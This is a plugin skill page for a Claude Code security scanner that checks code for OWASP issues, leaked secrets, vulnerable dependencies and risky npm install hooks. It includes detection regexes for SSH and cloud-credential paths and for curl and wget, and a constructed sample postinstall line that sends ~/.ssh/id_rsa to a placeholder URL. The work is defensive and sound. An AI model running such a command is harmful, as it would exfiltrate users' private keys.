From magician
Runs OWASP Top 10 checks, credential/secret detection, dependency audit, and auth spot-checks. Produces a severity-ranked report. Invoke with /sentinel [path].
How this skill is triggered — by the user, by Claude, or both
Slash command: /magician:sentinel

This skill is limited to the following tools:
The summary Claude sees in its skill listing — used to decide when to auto-load this skill
Run a comprehensive security scan of the codebase. Available as CLI: `magician-scan` (plugin-provided; on PATH when the plugin is enabled).
For very large repos, raise /effort so the analysis stays thorough across the codebase. See lore/models.md.
```sh
SCAN=$(command -v magician-scan 2>/dev/null || echo "${CLAUDE_PLUGIN_ROOT}/bin/magician-scan")
[ -x "$SCAN" ] && "$SCAN" . || echo "magician-scan not found; skipping static-analysis step (continuing with remaining checks)"
```
magician-scan is plugin-provided (on PATH when the plugin is enabled). If absent, this step degrades gracefully and the remaining checks still run.
Reports: hardcoded credentials, private keys, eval() calls, SQL injection via % formatting, innerHTML XSS, dangerouslySetInnerHTML, os.system calls, shell=True subprocess.
Run for the detected stack:

- npm audit
- pip-audit (if installed) or safety check
- govulncheck ./... (if installed)
- cargo audit

Known-CVE audits miss supply-chain attacks — the vector behind recent real incidents (litellm/PyPI, npm axios) where a plain install exfiltrates SSH keys, cloud creds, and env secrets. Check the install-time surface:

```sh
grep -rEn '"(preinstall|install|postinstall)"\s*:' package.json 2>/dev/null
```
(Python equivalent: custom setup.py/pyproject.toml build hooks.)

- An install-time script that reads sensitive locations (~/.ssh, ~/.aws, env vars, wallets) and reaches the network is high-risk; escalate as Critical.
- Recommend lockfile-based installs (npm ci, not npm install) and pinned versions.

Check for secrets in git history:

```sh
git log --all --full-history -p -- "*.env" "*.key" "*.pem" 2>/dev/null | grep -i "password\|secret\|key\|token" | head -20
```
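The install-time surface check above stops at a grep for lifecycle hooks; the following added example (not part of the magician plugin or magician-scan) goes one step further and rates each preinstall/install/postinstall script the way the skill describes: sensitive locations plus network reach is Critical. The indicator patterns and the sample package.json are constructed assumptions.

```python
"""Rate npm lifecycle scripts found in a package.json (added example, not plugin code)."""
import json
import re

LIFECYCLE = ("preinstall", "install", "postinstall")
# Assumed indicators: local secrets an install script has no business reading.
SENSITIVE = re.compile(
    r"~/\.ssh|~/\.aws|\.aws/credentials|process\.env|\$\{?[A-Z_]*(SECRET|TOKEN|KEY)|wallet",
    re.I,
)
# Assumed indicators: outbound network activity from an install script.
NETWORK = re.compile(r"\bcurl\b|\bwget\b|\bfetch\(|https?://|require\(['\"](https?|net)['\"]\)", re.I)
SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}


def rate_lifecycle_scripts(package_json_text: str) -> list[dict]:
    """Return one finding per lifecycle script, severity-ranked like the sentinel report."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        sensitive = bool(SENSITIVE.search(cmd))
        network = bool(NETWORK.search(cmd))
        if sensitive and network:
            severity = "CRITICAL"  # reads secrets and talks to the network: escalate
        elif sensitive or network:
            severity = "HIGH"
        else:
            severity = "MEDIUM"  # any lifecycle script widens the install-time surface
        findings.append({"hook": hook, "command": cmd, "severity": severity})
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])


# Constructed sample: a benign version check next to a postinstall that touches ~/.ssh and a URL.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "demo-app",
    "scripts": {
        "preinstall": "node scripts/check-node-version.js",
        "postinstall": "node collect.js ~/.ssh/id_rsa https://example.invalid/upload",
        "test": "jest",
    },
})

if __name__ == "__main__":
    for finding in rate_lifecycle_scripts(SAMPLE_PACKAGE_JSON):
        print(f"[{finding['severity']}] package.json scripts.{finding['hook']} — {finding['command']}")
```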
For web archetypes: identify all API endpoints and verify auth middleware is applied.
Scan for user input without sanitization.
```text
=== SENTINEL SECURITY REPORT ===
Date: <timestamp>
Target: <path>
CRITICAL: N
HIGH: N
MEDIUM: N
LOW: N
[CRITICAL] src/auth.ts:45 — Hardcoded API key
[HIGH] src/db.ts:12 — SQL query built with string concatenation
...
DEPENDENCY AUDIT: N vulnerabilities found
OVERALL POSTURE: Clean | Needs attention | Requires immediate action
```
For CI pipeline use: magician-scan exits 0 (clean) or 1 (issues).
```yaml
# .github/workflows/security.yml
- name: Security scan
  run: magician-scan .
```

"Sentinel complete. Review the report above and run /scrutinize for systematic remediation."
```sh
npx claudepluginhub alexander-tyagunov/magician --plugin magician
```

Scans codebases for OWASP Top 10 vulnerabilities via static analysis: secret exposure, injection flaws, auth/authz gaps, supply-chain risks, misconfigurations, logging failures. Use before deployments, PR merges, auth/payment changes.
Scans codebases for exposed secrets, vulnerable dependencies, injection flaws, and OWASP Top 10 issues. Run before deploying, open-sourcing, or compliance audits.